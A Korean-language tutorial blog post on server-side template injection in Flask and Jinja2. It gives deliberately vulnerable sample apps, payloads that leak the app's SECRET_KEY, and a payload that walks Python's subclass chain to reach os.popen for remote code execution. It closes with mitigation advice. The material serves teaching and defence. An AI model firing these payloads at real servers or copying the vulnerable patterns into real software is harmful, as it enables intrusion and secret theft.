SSTI(Server Side Template Injection)

* SSTI (Server Side Template Injection) ?

SSTI 란 서버측에서 사용중인 Template의 구문을 이용하여 공격자가 입력한 페이로드를 Template로 인식하게하여 서버에서 실행되도록 하는 공격이다.

 

간단하게 Template과 Template Engine이란 뭐인가를 정의하고 가자면

Template Engine은 템플릿(정해진 틀)에 동적인 변수를 결합하여 빠르고 간편하게 렌더링해주는 소프트웨어이다.

 

HTML과 같은 정적인 문서에 동적인 변수를 결합하여 출력해준다. 정도로 이해하면 될거같다.

 

그럼 Template은 아래 예제 코드를 보면 이해할 수 있을거같다.

        
        
        
        COPY
      
from flask import Flask, render_template_string
 
app = Flask(__name__)
 
@app.route('/')
def index():
    data = request.args.get("data",'')
    template = '''<h1> what is template ?? is <span style="color:grey">{}</span></h1>'''.format(data)
    return render_template_string(template)
 
app.run(host="localhost", port=3334)

위 예제에서는 Flask에 내장된 Jinja2를 사용하였다.

 

다시 SSTI로 돌아와서...

SSTI의 경우 사용하는 Template Engine에 따라 구문이 조금씩 차이가 있어서 식별을 위해선 아래의 관련 Template의 Engine에 따른 페이로드를 테스트하여 식별할 수 있다.

대표적인 Template Engine을 몇개 적어보면 

• Jinja2 (python)
• Smarty (php)
• Mako (python)
• Twig (php)

등이 존재한다.

 

아래는 Jinja2 에서 Template 구문에 대한 구분자이다.

• {% ... %} : 상태에 대한 구분자. for 문이나 if 문을 사용할때 필요하다
• {{ ... }} : template output에 대한 구분자, 변수를 넣어 출력 가능하다.
• {# ... #} : 주석에 대한 구분자

그럼 Jinja2에서의 Template injection 페이로드를 보며 확인해보자.

 

* SSTI 공격 실습

Jinja2

위의 예제 코드는 data라는 파라미터를 GET으로 받아서 출력해주고있다.

해당 구문에 {{ 7 * 7 }}을 입력해보면 아래처럼 49가 출력이 된다.

 

해당 구문이 template으로 해석이 되어 동작이 되는것을 확인할 수 있다.

 

그러면 template에 들어가는 변수를 사용자가 입력할 수 있으면 무조건 template으로 해석되는가 ??

 

아래 코드를 보자

        
        
        
        COPY
      
from flask import Flask, request
from jinja2 import Environment, Template
 
app = Flask(__name__)
env = Environment()
 
@app.route("/", methods=["GET"])
def index():
    data = request.args.get("data", '')
 
    # 1. this is vulnarble with ssti
    template = '''#1. hello ''' + data + ''' !'''
    output1 = env.from_string(template).render()
    print(output1)
 
    # 2. this is vulnarble with ssti
    template = '''#2. hello {} !'''.format(data)
    output2 = env.from_string(template).render()
    print(output2)
 
    # 3. this is not vulnarble
    template = '''#3. hello {{ data }} !'''
    output3 = env.from_string(template).render(data=data)
    print(output3)
 
    return output3
 
app.run(host="localhost", port=3333)

 

#1 , #2 번 부분은 사용자로 부터 받은 입력값을 템플릿 자체에 그대로 변수에 입력하여 render 시키고있다.

반면 #3. 의 경우 {{ }} 안에 render 함수를 통해 argument 로서 들어가서 render 시키게 되어 사용자가 템플릿 구문을 넣어도 무시되게 된다.(확실한지는 모르겠다) (참고자료 : https://youtu.be/3cT0uE7Y87s?t=374)

 

아래는 각 #1. #2. #3 을 대상으로 {{ 7 * 7 }}을 입력한 결과이다.

 

 

다른 코드를 살펴보자.

        
        
        
        COPY
      
from flask import Flask, render_template_string, request
 
app = Flask(__name__)
app.config.SECRET_KEY = "supersecret"
 
@app.route('/')
def index():
    data = request.args.get("data",'')
    
    #1. this is vulnarble with ssti
    template = '''#1 <h1> what is template ?? is <span style="color:grey">'''+ data +'''</span></h1>'''
    print(render_template_string(template))
 
    #2. this is vulnarble with ssti
    template = '''#2 <h1> what is template ?? is <span style="color:grey">{}</span></h1>'''.format(data)
    print(render_template_string(template))
 
    #3. this is not vulnarble
    template = '''#3 <h1> what is template ?? is <span style="color:grey">{{ data }}</span></h1>'''
    print(render_template_string(template,data=data))
 
    return "test"
 
app.run(host="localhost", port=3334)

해당 코드는 flask에 내장된 jinja를 사용하는데, render_template_string이라는 함수를 통해 template을 변환한다.

 

위에 살펴본 예제와 마찬가지로 

변수를 바로 넣는 경우에는 취약하지만, render 함수를 통해 인자로 들어가게되면 SSTI가 발생하지 않는다.

 

data에 {{ config }} 를 입력하면 Flask의 config object에 접근가능하여 내용이 출력된다.

 

config는 flask에 포함되어있는 클래이스이며, flask 어플리케이션 실행 환경에서 다양한 종류의 설정 값들을 변경할 수 있도록 해준다.

 

config 클래스에 내장된 고유 설정값들이 있는데 그 중 SECRTE_KEY는 세션이나 쿠키의 암호화에 사용되는 비밀키 값이다.

 

이를 {{config.SECRET_KEY}} 통해 출력이 가능하다.

* SSTI - RCE(Remote Code Execution) in flask

다음은 아래코드를 예시로 SSTI 취약점을 이용해 RCE를 진행해보자.

        
        
        
        COPY
      
from flask import Flask, render_template_string, request
 
app = Flask(__name__)
app.config.SECRET_KEY = "supersecrtekey"
 
@app.route('/')
def index():
    data = request.args.get("data",'')
    template = '''<h1> what is template ?? is <span style="color:grey">{}</span></h1>'''.format(data)
    return render_template_string(template)
 
app.run(host="localhost", port=3334)

flask 에서는 python의 special attribute를 활용한다.

 

python은 모든 클래스에서 내장 object 클래스를 상속 받는다.

하여 아래처럼 클래스에 함수나 다른 클래스를 정의하지 않아도 기본적으로 상속받은 클래스들이 존재한다.

        
        
        
        COPY
      
class heogi:
	pass
 
print(dir(heogi))
 
#['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__']

아래처럼 빈 문자열 객체도 마찬가지이다.

        
        
        
        COPY
      
print(dir(""))
 
#['__add__', '__class__', '__contains__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getnewargs__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mod__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rmod__', '__rmul__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'capitalize', 'casefold', 'center', 'count', 'encode', 'endswith', 'expandtabs', 'find', 'format', 'format_map', 'index', 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'removeprefix', 'removesuffix', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill']

이런 하위 클래스들을 이용하여 파일 읽기, 프로세스 실행등을 할 수 있다.

 

먼저 프로세스 실행을 진행해보면

(먼저 파일 읽기 부터 진행해보려 했지만, File 클래스가 안보여서 패스...ㅠ)

 

아래 코드로 subclass 들을 확인 할 수 있다.

        
        
        
        COPY
      
"".__class__.__mro__[1].__subclasses__()
 
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, <class 'filter'>, <class 'map'>, <class 'zip'>, <class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib.BuiltinImporter'>, <class 'classmethod'>, <class '_frozen_importlib.FrozenImporter'>, <class '_frozen_importlib._ImportLockContext'>, <class '_thread._localdummy'>, <class '_thread._local'>, <class '_thread.lock'>, <class '_thread.RLock'>, <class '_frozen_importlib_external.WindowsRegistryFinder'>, <class '_frozen_importlib_external._LoaderBasics'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.PathFinder'>, <class '_frozen_importlib_external.FileFinder'>, <class 'nt.ScandirIterator'>, <class 'nt.DirEntry'>, <class '_io._IOBase'>, <class '_io._BytesIOBuffer'>, <class '_io.IncrementalNewlineDecoder'>, <class 'PyHKEY'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.Codec'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'MultibyteCodec'>, <class 'MultibyteIncrementalEncoder'>, <class 'MultibyteIncrementalDecoder'>, <class 'MultibyteStreamReader'>, <class 'MultibyteStreamWriter'>, <class '_abc._abc_data'>, <class 'abc.ABC'>, <class 'dict_itemiterator'>, <class 'collections.abc.Hashable'>, <class 'collections.abc.Awaitable'>, <class 'types.GenericAlias'>, <class 'collections.abc.AsyncIterable'>, <class 'async_generator'>, <class 'collections.abc.Iterable'>, <class 'bytes_iterator'>, <class 'bytearray_iterator'>, <class 'dict_keyiterator'>, <class 'dict_valueiterator'>, <class 'list_iterator'>, <class 'list_reverseiterator'>, <class 'range_iterator'>, <class 'set_iterator'>, <class 'str_iterator'>, <class 'tuple_iterator'>, <class 'collections.abc.Sized'>, <class 'collections.abc.Container'>, <class 'collections.abc.Callable'>, <class 'os._wrap_close'>, <class 'os._AddedDllDirectory'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]

 

__mro__ 는 MRO(Method Resoultion Order)로 python에서 상속받은 메소드 결정 순서로, 다중 상속을 받았을 경우

동일한 이름을 가진 method를 호출할때 그 순서를 지정하는 것이다.

 

mro 까지만 확인해보면 문자열 class와 최상위 class인 object가 확인된다.

        
        
        
        COPY
      
"".__class__.__mro__
(<class 'str'>, <class 'object'>)

우리는 최상위 클래스의 하위 클래스 중 프로세스 실행을 위한 subprocess.Popen 클래스를 사용해야한다.

subprocess.Popen는 object 클래스의 subclass로 반환된 dictionary 중 458번째(환경마다 다름)이다.

 

아래는 popen 함수를 이용해 PC의 hostname을 출력하는 명령어를 실행하는 구문이다.

        
        
        
        COPY
      
{{"".__class__.__mro__[1].__subclasses__()[458].__init__.__globals__["sys"].modules["os"].popen("hostname").read()}}

* SSTI Mitigation

1. Sanitization

        
        
        
        COPY
      
from flask import Flask, render_template_string, request
 
app = Flask(__name__)
app.config.SECRET_KEY = "supersecret"
 
@app.route('/')
def index():
    data = request.args.get("data",'')
    
    #1. this is vulnarble with ssti
    template = '''#1 <h1> what is template ?? is <span style="color:grey">'''+ data +'''</span></h1>'''
    print(render_template_string(template))
 
    #2. this is vulnarble with ssti
    template = '''#2 <h1> what is template ?? is <span style="color:grey">{}</span></h1>'''.format(data)
    print(render_template_string(template))
 
    #3. this is not vulnarble
    template = '''#3 <h1> what is template ?? is <span style="color:grey">{{ data }}</span></h1>'''
    print(render_template_string(template,data=data))
 
    return "test"
 
app.run(host="localhost", port=3334)

사용자 입력이 바로 template으로 생성되지 않도록 해야한다.

위 코드의 3번처럼 template에서 제공하는 파라미터를 통해서 처리되도록 해야한다.

 

2. Sandboxing

사용자로 부터 입력값을 받아야만 한다면 template 환겨을 sandboxing하여 처리하는게 안전하다

(라고하는데 구체적인 예제 코드를 못 찾겠다.... 나중에 다시 찾아보자)